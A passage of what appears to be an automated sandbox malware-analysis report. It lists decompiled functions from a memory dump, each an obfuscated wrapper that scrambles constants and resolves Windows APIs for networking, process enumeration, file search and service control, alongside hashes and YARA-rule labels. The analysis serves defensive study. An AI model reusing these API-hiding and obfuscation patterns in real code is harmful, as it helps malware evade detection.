				_v8 = 0xbb5f19;
				_v8 = _v8 << 9;
				_v8 = _v8 | 0x616a7bee;
				_t39 =  &_v8; // 0x616a7bee
				_t66 = 0x5f;
				_v8 =  *_t39 / _t66;
				_v8 = _v8 ^ 0x01468cd5;
				E031D2309(_t66 + 0x22, _t66, _t66, 0x1d483158, _t66, 0xc0cf1a4);
				_t63 = InternetCloseHandle(_a12); // executed
				return _t63;
			}

0x031d54e0
0x031d54e3
0x031d54e6
0x031d54eb
0x031d54f0
0x031d54f7
0x031d5500
0x031d5507
0x031d550e
0x031d5515
0x031d551c
0x031d5523
0x031d552c
0x031d5531
0x031d5536
0x031d553d
0x031d5544
0x031d554b
0x031d5552
0x031d5559
0x031d5560
0x031d5567
0x031d556b
0x031d5572
0x031d5575
0x031d557d
0x031d5580
0x031d559e
0x031d55a9
0x031d55ae

APIs

InternetCloseHandle.WININET(007528C6), ref: 031D55A9

Strings

{ja, xrefs: 031D5572
-5, xrefs: 031D554B
Lp, xrefs: 031D5500

Memory Dump Source

Source File: 0000000E.00000002.1180794107.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: true

Similarity

API ID: CloseHandleInternet
String ID: -5$Lp${ja
API String ID: 1081599783-1222928185
Opcode ID: 96c25ca98efac3a213f8ce2c5c378593396d62ac674d19cb573e17f5676fb90f
Instruction ID: df10227605e9fd9adf60eda034db533139349ce236a105f2732446101dc3ef9e
Opcode Fuzzy Hash: 96c25ca98efac3a213f8ce2c5c378593396d62ac674d19cb573e17f5676fb90f
Instruction Fuzzy Hash: 3821F3B6D0120DABDF04DFA5C94A9AEBBB1EB14314F108199A520AA260E3B95B14CF91

Uniqueness

Uniqueness Score: -1.00%

Function 031EF606, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E031EF606(void* __ecx, void* __edx, struct tagPROCESSENTRY32W* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t43;
				void* _t50;
				void* _t54;

				_push(_a8);
				_t54 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E031F2523(_t43);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0xf33a94;
				_v8 = 0x16e1c5;
				_v8 = _v8 << 0x10;
				_v8 = _v8 + 0xffff7501;
				_v8 = _v8 * 0x3d;
				_v8 = _v8 ^ 0xcbc2f299;
				_v20 = 0x18380a;
				_v20 = _v20 + 0x556a;
				_v20 = _v20 ^ 0x2e444359;
				_v20 = _v20 ^ 0x2e5734c8;
				_v16 = 0x1de0f;
				_v16 = _v16 + 0xffff3d0f;
				_v16 = _v16 ^ 0x5b4c4104;
				_v16 = _v16 ^ 0x5b45396c;
				_v12 = 0x8d2c67;
				_v12 = _v12 | 0x6bb36e73;
				_v12 = _v12 ^ 0x44de99d4;
				_v12 = _v12 ^ 0x2f6e43e4;
				_t50 = E031D2309(0x343, __ecx, __ecx, 0x1a63a552, __ecx, 0x9c9047d0);
				Process32FirstW(_t54, _a4); // executed
				return _t50;
			}

0x031ef60d
0x031ef610
0x031ef612
0x031ef615
0x031ef616
0x031ef617
0x031ef61c
0x031ef623
0x031ef627
0x031ef62e
0x031ef635
0x031ef639
0x031ef650
0x031ef653
0x031ef65a
0x031ef661
0x031ef668
0x031ef66f
0x031ef676
0x031ef67d
0x031ef684
0x031ef68b
0x031ef692
0x031ef699
0x031ef6a0
0x031ef6a7
0x031ef6c0
0x031ef6cc
0x031ef6d2

APIs

Process32FirstW.KERNEL32(00000000,2F6E43E4,?,?,?,?,?,?,?,?,00000000), ref: 031EF6CC

Strings

l9E[, xrefs: 031EF68B
Cn/, xrefs: 031EF6A7
YCD., xrefs: 031EF668

Memory Dump Source

Source File: 0000000E.00000002.1180794107.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: true

Similarity

API ID: FirstProcess32
String ID: YCD.$l9E[$Cn/
API String ID: 2623510744-4191728293
Opcode ID: ba6908419aca7e40de5752100cf2159fdf1c013576c21fa5a45c6b552e88f8aa
Instruction ID: 0eb6034f8e3bdf531be83da86e16a92c36e7ace8477b33610dd30a5167a1422c
Opcode Fuzzy Hash: ba6908419aca7e40de5752100cf2159fdf1c013576c21fa5a45c6b552e88f8aa
Instruction Fuzzy Hash: D52122BAC01219EBCF08DFA4D9499AEBBB4EF14715F108689E525B6210D3745B109F91

Uniqueness

Uniqueness Score: -1.00%

Function 031EA809, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E031EA809(DWORD* __ecx, void* __edx, intOrPtr _a12, WCHAR* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t45;
				int _t55;
				DWORD* _t60;

				_t60 = __ecx;
				_push(0);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E031F2523(_t45);
				_v36 = 0x72e62c;
				_v32 = 0x6afee3;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0x241442;
				_v12 = _v12 ^ 0x5f0a7563;
				_v12 = _v12 * 0x4b;
				_v12 = _v12 + 0xffff00d5;
				_v12 = _v12 ^ 0xe298fffa;
				_v20 = 0x629ccf;
				_v20 = _v20 + 0xa262;
				_v20 = _v20 ^ 0x006504c5;
				_v8 = 0x8dfd52;
				_v8 = _v8 * 0x5f;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 << 0xd;
				_v8 = _v8 ^ 0x1a5bea6c;
				_v16 = 0x13a484;
				_v16 = _v16 * 0x42;
				_v16 = _v16 ^ 0x051e7b21;
				E031D2309(0x1c8, __ecx, __ecx, 0xfc0d3d9c, __ecx, 0x9c9047d0);
				_t55 = GetVolumeInformationW(_a16, 0, 0, _t60, 0, 0, 0, 0); // executed
				return _t55;
			}

0x031ea813
0x031ea815
0x031ea816
0x031ea817
0x031ea81a
0x031ea81d
0x031ea81e
0x031ea81f
0x031ea822
0x031ea825
0x031ea828
0x031ea82b
0x031ea82e
0x031ea82f
0x031ea831
0x031ea832
0x031ea837
0x031ea841
0x031ea848
0x031ea84b
0x031ea84e
0x031ea855
0x031ea86c
0x031ea86f
0x031ea876
0x031ea87d
0x031ea884
0x031ea88b
0x031ea892
0x031ea8a3
0x031ea8a6
0x031ea8aa
0x031ea8ae
0x031ea8b5
0x031ea8c0
0x031ea8c3
0x031ea8d6
0x031ea8e8
0x031ea8ef

APIs

GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 031EA8E8

Strings

,r, xrefs: 031EA837
cu_, xrefs: 031EA855

Memory Dump Source

Source File: 0000000E.00000002.1180794107.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: true

Similarity

API ID: InformationVolume
String ID: ,r$cu_
API String ID: 2039140958-355032270
Opcode ID: 11f0a768391377fe69868ce35b1527178b61e9fcd2d284546a7f3ae16540a2da
Instruction ID: 3dd2c035d640dc97eb86823a1561ba171703e548dac56f764edde355a4ba7c1e
Opcode Fuzzy Hash: 11f0a768391377fe69868ce35b1527178b61e9fcd2d284546a7f3ae16540a2da
Instruction Fuzzy Hash: 0521E0B1801249BBCF14CFA6DD49CDFBFB9EB86704F108099F910A6260D3B59A15DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 031DFBFA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E031DFBFA(void* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t48;
				int _t57;
				signed int _t59;

				_push(_a8);
				_push(_a4);
				E031F2523(_t48);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x49672e;
				_v32 = 0xb6dd69;
				_v16 = 0x714492;
				_v16 = _v16 >> 4;
				_v16 = _v16 + 0x8cae;
				_v16 = _v16 + 0xf12f;
				_v16 = _v16 ^ 0x0001c43a;
				_v20 = 0xe1aff5;
				_v20 = _v20 + 0x563d;
				_v20 = _v20 ^ 0x00ec4f92;
				_v12 = 0xff415;
				_v12 = _v12 + 0x39cf;
				_v12 = _v12 | 0x79f6ff5d;
				_v12 = _v12 ^ 0x79f7d296;
				_v8 = 0xdebe32;
				_t59 = 0x1e;
				_v8 = _v8 / _t59;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 ^ 0x0002d9b6;
				E031D2309(0x336, _t59, _t59, 0xd09d8658, _t59, 0x9c9047d0);
				_t57 = FindClose(_a8); // executed
				return _t57;
			}

0x031dfc00
0x031dfc03
0x031dfc08
0x031dfc0d
0x031dfc14
0x031dfc1a
0x031dfc21
0x031dfc28
0x031dfc2f
0x031dfc33
0x031dfc3a
0x031dfc41
0x031dfc48
0x031dfc4f
0x031dfc56
0x031dfc5d
0x031dfc64
0x031dfc6b
0x031dfc72
0x031dfc79
0x031dfc85
0x031dfc8d
0x031dfc90
0x031dfc94
0x031dfc98
0x031dfcb8
0x031dfcc3
0x031dfcc8

APIs

FindClose.KERNEL32(0001C43A), ref: 031DFCC3

Strings

=V, xrefs: 031DFC4F
.gI, xrefs: 031DFC1A

Memory Dump Source

Source File: 0000000E.00000002.1180794107.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: true

Similarity

API ID: CloseFind
String ID: .gI$=V
API String ID: 1863332320-2530093900
Opcode ID: 110af252eeec9babbf3e3997d431909c73a56f909e67471b0c3fb51db6a30985
Instruction ID: 4db7eba5b202c10ec0f1a0b2dd4107ab7857a55a165927a08f970f2c154d5629
Opcode Fuzzy Hash: 110af252eeec9babbf3e3997d431909c73a56f909e67471b0c3fb51db6a30985
Instruction Fuzzy Hash: 352136B5D0020CEFDB04DFD5C94A9EEBBB0FB54318F10C499E52466240E3B95B549F90

Uniqueness

Uniqueness Score: -1.00%

Function 031EE9E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
fileCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E031EE9E8(void* __ecx, void* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t39;
				int _t47;
				void* _t51;

				_push(_a16);
				_t51 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E031F2523(_t39);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x7dd1c2;
				_v20 = 0xe6ed41;
				_v20 = _v20 ^ 0x6eedbecd;
				_v20 = _v20 * 0x45;
				_v20 = _v20 ^ 0xa90eba26;
				_v16 = 0x25fde1;
				_v16 = _v16 + 0xffffc5d1;
				_v16 = _v16 | 0x325ad611;
				_v16 = _v16 ^ 0x3277e624;
				_v8 = 0x448e1b;
				_v8 = _v8 | 0xd7f3ffef;
				_v8 = _v8 ^ 0xcff08007;
				_v8 = _v8 ^ 0x180d74c6;
				_v12 = 0x3a9cbc;
				_v12 = _v12 | 0xfe729dd7;
				_v12 = _v12 ^ 0xfe7a3202;
				E031D2309(0x2de, __ecx, __ecx, 0xa7d3fbc8, __ecx, 0x9c9047d0);
				_t47 = FindNextFileW(_t51, _a4); // executed
				return _t47;
			}

0x031ee9ef
0x031ee9f2
0x031ee9f4
0x031ee9f7
0x031ee9fa
0x031ee9fe
0x031ee9ff
0x031eea04
0x031eea0b
0x031eea12
0x031eea19
0x031eea30
0x031eea33
0x031eea3a
0x031eea41
0x031eea48
0x031eea4f
0x031eea56
0x031eea5d
0x031eea64
0x031eea6b
0x031eea72
0x031eea79
0x031eea80
0x031eea99
0x031eeaa5
0x031eeaab

APIs

FindNextFileW.KERNELBASE(00000000,FE7A3202,?,?,?,?,?,?,?,?,?,?,00000072), ref: 031EEAA5

Strings

$w2, xrefs: 031EEA4F
A, xrefs: 031EEA12

Memory Dump Source

Source File: 0000000E.00000002.1180794107.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: true

Similarity

API ID: FileFindNext
String ID: $w2$A
API String ID: 2029273394-2068021171
Opcode ID: 489ae82eb01001db2e27a8813198e8620566e78ec9ea4fd3dbf43d66dbc97652
Instruction ID: 50aa14b6b759172bb6e32cbe54b1408c2a539937452187d1a905e49c25525a0b
Opcode Fuzzy Hash: 489ae82eb01001db2e27a8813198e8620566e78ec9ea4fd3dbf43d66dbc97652
Instruction Fuzzy Hash: 981100B5C0121DAFCF05DFE8DA068AEBFB4FB04300F108589E915A6260E3B55B209F95

Uniqueness

Uniqueness Score: -1.00%

Function 031D8A5E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68
networkCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E031D8A5E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a24, WCHAR* _a36, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, WCHAR* _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t45;
				void* _t52;
				void* _t57;

				_push(_a56);
				_t57 = __edx;
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E031F2523(_t45);
				_v32 = 0xd5d112;
				_v28 = 0x50513d;
				_v24 = 0;
				_v12 = 0x46c43;
				_v12 = _v12 + 0xffffdfef;
				_v12 = _v12 | 0x9d8b3e1d;
				_v12 = _v12 ^ 0x9d8347af;
				_v20 = 0x816eb9;
				_v20 = _v20 + 0xffff29e2;
				_v20 = _v20 ^ 0x0080c9d8;
				_v8 = 0x807982;
				_v8 = _v8 | 0x5015719e;
				_v8 = _v8 ^ 0xfbfa9e2f;
				_v8 = _v8 ^ 0xab6f9dce;
				_v16 = 0xec1576;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x000e8763;
				E031D2309(0x18c, __ecx, __ecx, 0xb50c381d, __ecx, 0xc0cf1a4);
				_t52 = HttpOpenRequestW(_t57, _a36, _a56, 0, 0, 0, _a24, 0); // executed
				return _t52;
			}

0x031d8a66
0x031d8a6b
0x031d8a6d
0x031d8a70
0x031d8a73
0x031d8a76
0x031d8a77
0x031d8a7a
0x031d8a7b
0x031d8a7c
0x031d8a7f
0x031d8a80
0x031d8a83
0x031d8a86
0x031d8a89
0x031d8a8c
0x031d8a8d
0x031d8a8e
0x031d8a93
0x031d8a9d
0x031d8aa4
0x031d8aa7
0x031d8aae
0x031d8ab5
0x031d8abc
0x031d8ac3
0x031d8aca
0x031d8ad1
0x031d8ad8
0x031d8adf
0x031d8ae6
0x031d8aed
0x031d8af4
0x031d8afb
0x031d8aff
0x031d8b24
0x031d8b3a
0x031d8b41

APIs

HttpOpenRequestW.WININET(?,?,?,00000000,00000000,00000000,00D5D112,00000000), ref: 031D8B3A

Strings

=QP, xrefs: 031D8A9D

Memory Dump Source

Source File: 0000000E.00000002.1180794107.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: true

Similarity

API ID: HttpOpenRequest
String ID: =QP
API String ID: 1984915467-456757808
Opcode ID: 4cc3d4786cdcc23149290c3469cd4bf7c683ba33055c948049ab044fbc38bf75
Instruction ID: 24754e5ba3fa8cfb093e776dc64c430b8c6927e040a05118f053e4e85aa8b392
Opcode Fuzzy Hash: 4cc3d4786cdcc23149290c3469cd4bf7c683ba33055c948049ab044fbc38bf75
Instruction Fuzzy Hash: 7121F3B2801208BB8F559F95CC49CDFBF79EF89700F108148B91466220D3B58A65DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 031E42E4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
memoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E031E42E4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t43;
				char _t54;
				signed int _t57;
				void* _t62;
				void* _t63;

				_push(_a20);
				_t62 = __edx;
				_push(_a16);
				_t63 = __ecx;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E031F2523(_t43);
				_v36 = 0xead706;
				_v32 = 0x8aaadf;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0x3b6f9b;
				_t57 = 0x3f;
				_v12 = _v12 * 0xe;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x1a7fe3f0;
				_v20 = 0x6318b1;
				_v20 = _v20 | 0x2b2fc1f2;
				_v20 = _v20 ^ 0x2b6f417a;
				_v8 = 0xeb56a2;
				_v8 = _v8 << 1;
				_v8 = _v8 / _t57;
				_v8 = _v8 * 0x2f;
				_v8 = _v8 ^ 0x015d5ff9;
				_v16 = 0x2619ef;
				_v16 = _v16 << 6;
				_v16 = _v16 ^ 0x098e35d6;
				E031D2309(_t57 + 0x4d, _t57, _t57, 0x52f9059f, _t57, 0x9c9047d0);
				_t54 = RtlFreeHeap(_t62, 0, _t63); // executed
				return _t54;
			}

0x031e42ed
0x031e42f2
0x031e42f4
0x031e42f7
0x031e42f9
0x031e42fa
0x031e42fd
0x031e4300
0x031e4301
0x031e4302
0x031e4307
0x031e4311
0x031e431a
0x031e431d
0x031e4320
0x031e432d
0x031e4334
0x031e4337
0x031e433b
0x031e4342
0x031e4349
0x031e4350
0x031e4357
0x031e435e
0x031e436b
0x031e4377
0x031e437a
0x031e4381
0x031e4388
0x031e438c
0x031e439f
0x031e43aa
0x031e43b2

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,072B1AC5,00000000,00000000), ref: 031E43AA

Strings

zAo+, xrefs: 031E4350

Memory Dump Source

Source File: 0000000E.00000002.1180794107.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: true

Similarity

API ID: FreeHeap
String ID: zAo+
API String ID: 3298025750-440923707
Opcode ID: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
Instruction ID: a7490b2b89ab1245ae629f17fbbcc78cc0e433fa066844b81a11f561c463274b
Opcode Fuzzy Hash: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
Instruction Fuzzy Hash: C92148B1C00218BF9B08DF99D98A8EEBFB8FB49344F508199E525AB240D3B05B149B90

Uniqueness

Uniqueness Score: -1.00%

Function 031EA4A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E031EA4A0(void* __ecx, void* __edx, intOrPtr _a4, struct tagPROCESSENTRY32W _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t40;
				int _t49;
				void* _t51;
				void* _t54;

				_push(_a8);
				_t54 = __ecx;
				_push(_a4);
				_push(__ecx);
				E031F2523(_t40);
				_v36 = 0x141422;
				asm("stosd");
				_push(0x9c9047d0);
				asm("stosd");
				_push(__ecx);
				_push(0xb41b9fb1);
				_push(__ecx);
				asm("stosd");
				_v20 = 0x6e8e4;
				_v20 = _v20 << 1;
				_push(__ecx);
				_t51 = 0x1c;
				_v20 = _v20 * 0x65;
				_v20 = _v20 ^ 0x05792b89;
				_v8 = 0x17694a;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 + 0x7593;
				_v8 = _v8 + 0x3dc6;
				_v8 = _v8 ^ 0x000c8dea;
				_v16 = 0x6183ab;
				_v16 = _v16 << 3;
				_v16 = _v16 | 0x753fc9cb;
				_v16 = _v16 ^ 0x773f8770;
				_v12 = 0x2bda5d;
				_v12 = _v12 + 0xffff2e51;
				_v12 = _v12 ^ 0x7ae43c2f;
				_v12 = _v12 ^ 0x7acc85af;
				E031D2309(_t51);
				_t49 = Process32NextW(_t54, _a8); // executed
				return _t49;
			}

0x031ea4a8
0x031ea4ab
0x031ea4ad
0x031ea4b1
0x031ea4b2
0x031ea4b7
0x031ea4c6
0x031ea4c7
0x031ea4cc
0x031ea4cd
0x031ea4ce
0x031ea4d3
0x031ea4d4
0x031ea4d5
0x031ea4dc
0x031ea4e3
0x031ea4e6
0x031ea4e7
0x031ea4ea
0x031ea4f1
0x031ea4f8
0x031ea4fc
0x031ea503
0x031ea50a
0x031ea511
0x031ea518
0x031ea51c
0x031ea523
0x031ea52a
0x031ea531
0x031ea538
0x031ea53f
0x031ea552
0x031ea55e
0x031ea565

APIs

Process32NextW.KERNEL32(00000000,773F8770,?,?,?,?,?,?,?,?,00000000), ref: 031EA55E

Strings

/<z, xrefs: 031EA538

Memory Dump Source

Source File: 0000000E.00000002.1180794107.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: true

Similarity

API ID: NextProcess32
String ID: /<z
API String ID: 1850201408-2186077011
Opcode ID: ee7739c6ebbc081d39b179a51fe32828a234b3ca8a11d0ef1921ab7f81e9d2f1
Instruction ID: b81122fab7b3e24146193b52c76581eff410ceab0491f2ba76ad3fb23330f48a
Opcode Fuzzy Hash: ee7739c6ebbc081d39b179a51fe32828a234b3ca8a11d0ef1921ab7f81e9d2f1
Instruction Fuzzy Hash: 7A215675C01219FFDF04CF95C8098EEBBB4FB48314F108589E428A6260D3B85B459F90

Uniqueness

Uniqueness Score: -1.00%

Function 031DF2CC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
networkCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E031DF2CC(void* __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a32) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				void* __ecx;
				void* _t36;
				void* _t44;
				void* _t46;

				_push(_a32);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E031F2523(_t36);
				_v28 = 0x481ca4;
				_v24 = 0;
				_v20 = 0xca1952;
				_v20 = _v20 ^ 0x1684c8f8;
				_v20 = _v20 ^ 0x16482d99;
				_v12 = 0xc193bc;
				_v12 = _v12 ^ 0x27e4a297;
				_v12 = _v12 | 0xa7673761;
				_v12 = _v12 ^ 0xa76f04da;
				_v8 = 0xc5b902;
				_push(0xc0cf1a4);
				_push(_t45);
				_push(0xb325898b);
				_push(_t45);
				_v8 = _v8 * 0x4e;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x03c56f69;
				_v16 = 0x24ec4f;
				_v16 = _v16 + 0xffffc13d;
				_v16 = _v16 ^ 0x002fbbc3;
				_push(_t45);
				_t46 = 0x50;
				E031D2309(_t46);
				_t44 = InternetOpenW(0, _a12, 0, 0, 0); // executed
				return _t44;
			}

0x031df2d3
0x031df2d8
0x031df2d9
0x031df2da
0x031df2db
0x031df2dc
0x031df2df
0x031df2e2
0x031df2e7
0x031df2ec
0x031df2f6
0x031df2f9
0x031df300
0x031df307
0x031df30e
0x031df315
0x031df31c
0x031df323
0x031df32a
0x031df335
0x031df33a
0x031df33b
0x031df340
0x031df341
0x031df344
0x031df348
0x031df34f
0x031df356
0x031df35d
0x031df370
0x031df373
0x031df374
0x031df383
0x031df389

APIs

InternetOpenW.WININET(00000000,16482D99,00000000,00000000,00000000), ref: 031DF383

Strings

O$, xrefs: 031DF34F

Memory Dump Source

Source File: 0000000E.00000002.1180794107.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: true

Similarity

API ID: InternetOpen
String ID: O$
API String ID: 2038078732-838329570
Opcode ID: bfd598ea9fc20005dd18c51756325e876dca57c81b5a8b40325e3a3f8c113345
Instruction ID: 2c870a58a616d5717cc8711a6990b003141ff85f483ac7c703653af77b4ddc5e
Opcode Fuzzy Hash: bfd598ea9fc20005dd18c51756325e876dca57c81b5a8b40325e3a3f8c113345
Instruction Fuzzy Hash: F71124B1C0122DBB8B15DFA5CD4A8DFBFB8EF05754F108589F814B6110C3B15A54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 031DE0A2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32 ref: 031DE168

Strings

|p, xrefs: 031DE0FA

Memory Dump Source

Source File: 0000000E.00000002.1180794107.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: true

Similarity

API ID: InfoNativeSystem
String ID: |p
API String ID: 1721193555-2455131449
Opcode ID: 1373000f67fd09352ab480020baae7fa00b59f1f2ab89e5c019d1be64afd4c0b
Instruction ID: c225bfc46a2b1fbe6899fbf3ada68623e46345183b3547daeeae4ebd2017bbe1
Opcode Fuzzy Hash: 1373000f67fd09352ab480020baae7fa00b59f1f2ab89e5c019d1be64afd4c0b
Instruction Fuzzy Hash: DE2138B6D00318FFDB48DFA4C8468EEBBB4FB45310F108599E4156A290D3B85B51CF90

Uniqueness

Uniqueness Score: -1.00%

Function 031EFE9D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E031EFE9D(void* __edx, intOrPtr _a4, intOrPtr _a8, int _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* __ecx;
				void* _t34;
				void* _t41;
				void* _t43;

				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				E031F2523(_t34);
				_v32 = 0xfebeef;
				_v28 = 0x6b4d4f;
				_v24 = 0;
				_v20 = 0x72d4d3;
				_v20 = _v20 + 0x7ce2;
				_v20 = _v20 ^ 0x0072d8bc;
				_v16 = 0x618a6;
				_v16 = _v16 + 0x2ac;
				_v16 = _v16 ^ 0x00083b16;
				_v12 = 0x17740f;
				_v12 = _v12 + 0x9d82;
				_v12 = _v12 ^ 0x0012bdfc;
				_v8 = 0xba692b;
				_v8 = _v8 ^ 0x31422697;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x0005552e;
				_push(0x21ce39be);
				_push(0xb53dc03);
				_push(_t42);
				_push(_t42);
				_t43 = 0x15;
				E031D2309(_t43);
				_t41 = OpenSCManagerW(0, 0, _a16); // executed
				return _t41;
			}

0x031efea4
0x031efea9
0x031efeaa
0x031efead
0x031efeb1
0x031efeb2
0x031efeb7
0x031efec1
0x031efec8
0x031efecb
0x031efed2
0x031efed9
0x031efee0
0x031efee7
0x031efeee
0x031efef5
0x031efefc
0x031eff03
0x031eff0a
0x031eff11
0x031eff18
0x031eff1c
0x031eff2f
0x031eff35
0x031eff3a
0x031eff3b
0x031eff3e
0x031eff3f
0x031eff4c
0x031eff52

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,031E5191,?,?,?,?,?,?,?,?,?,?,0EB411AB), ref: 031EFF4C

Strings

OMk, xrefs: 031EFEC1

Memory Dump Source

Source File: 0000000E.00000002.1180794107.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: true

Similarity

API ID: ManagerOpen
String ID: OMk
API String ID: 1889721586-456170103
Opcode ID: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction ID: fc881db23ff79d42dec263e8cf8a5fe0bbaa7f1634cdcb6d44079e3cdcfb68cc
Opcode Fuzzy Hash: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction Fuzzy Hash: 3F1125B6C0022CBBDB11EFA5D90A8EFBFB4FF45318F108088E9146A211D3B95B159F91

Uniqueness

Uniqueness Score: -1.00%

Function 031E199D, Relevance: 1.6, APIs: 1, Instructions: 71
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E031E199D(void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a20, long _a24, long _a28, long _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				void* _t68;
				signed int _t69;
				signed int _t70;

				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E031F2523(_t55);
				_v12 = 0xd4f63c;
				_v12 = _v12 >> 7;
				_v12 = _v12 << 0xf;
				_v12 = _v12 + 0xffffff46;
				_v12 = _v12 ^ 0xd4fb5fe8;
				_v8 = 0x967d18;
				_v8 = _v8 + 0xffffef98;
				_t69 = 0x14;
				_v8 = _v8 / _t69;
				_t70 = 0x4a;
				_v8 = _v8 / _t70;
				_v8 = _v8 ^ 0x000a0722;
				_v20 = 0x4653bc;
				_v20 = _v20 * 0x70;
				_v20 = _v20 ^ 0x1ec2604c;
				_v16 = 0x7577a9;
